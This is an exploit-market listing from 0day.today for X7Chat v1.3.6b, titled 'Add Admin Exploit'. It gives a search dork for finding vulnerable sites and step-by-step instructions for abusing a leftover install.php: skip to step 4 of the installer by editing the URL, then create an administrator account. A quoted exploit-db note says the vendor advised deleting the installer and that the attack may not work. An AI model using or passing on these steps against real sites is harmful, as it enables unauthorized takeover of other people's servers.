[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

X7CHAT v1.3.6b Add Admin Exploit

Author
d4rk-h4ck3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10564
Category
web applications
Date add
02-01-2010
Platform
unsorted
================================
X7CHAT v1.3.6b Add Admin Exploit
================================

#####################################################
# [+] Dork : powered by x7 chat 1.3.6b
#####################################################
 
##### Notes from the exploit-db.com team ############
# Vendor has already addressed this issue and even provided a solution in Docs/INSTALL.txt:
# "After finishing the online setup delete the file install.php.  If you do not it will be
# possible for anyone to create an administrator account on your chat server."
#
# Therefore please keep in mind this exploit is not guaranteed to work.
#####################################################
 
 
 
The exploit :
1- go http://site.com/script/X7Chat/install.php
2- Now you are in X7 Chat Install step 1 click continue
3- Now you are in X7 Chat Install step 2 click also continue
4- Now you are in X7 Chat Install step 3 .
 change url from http://site.com/script/x7chat/install.php?step=3 to http://site.com/script/x7chat/install.php?step=4
5- now add user name and password
6- Go login page http://site.com/script/X7Chat/index.php
 
Good luck and don't make something bad .



#  0day.today [2024-12-23]  #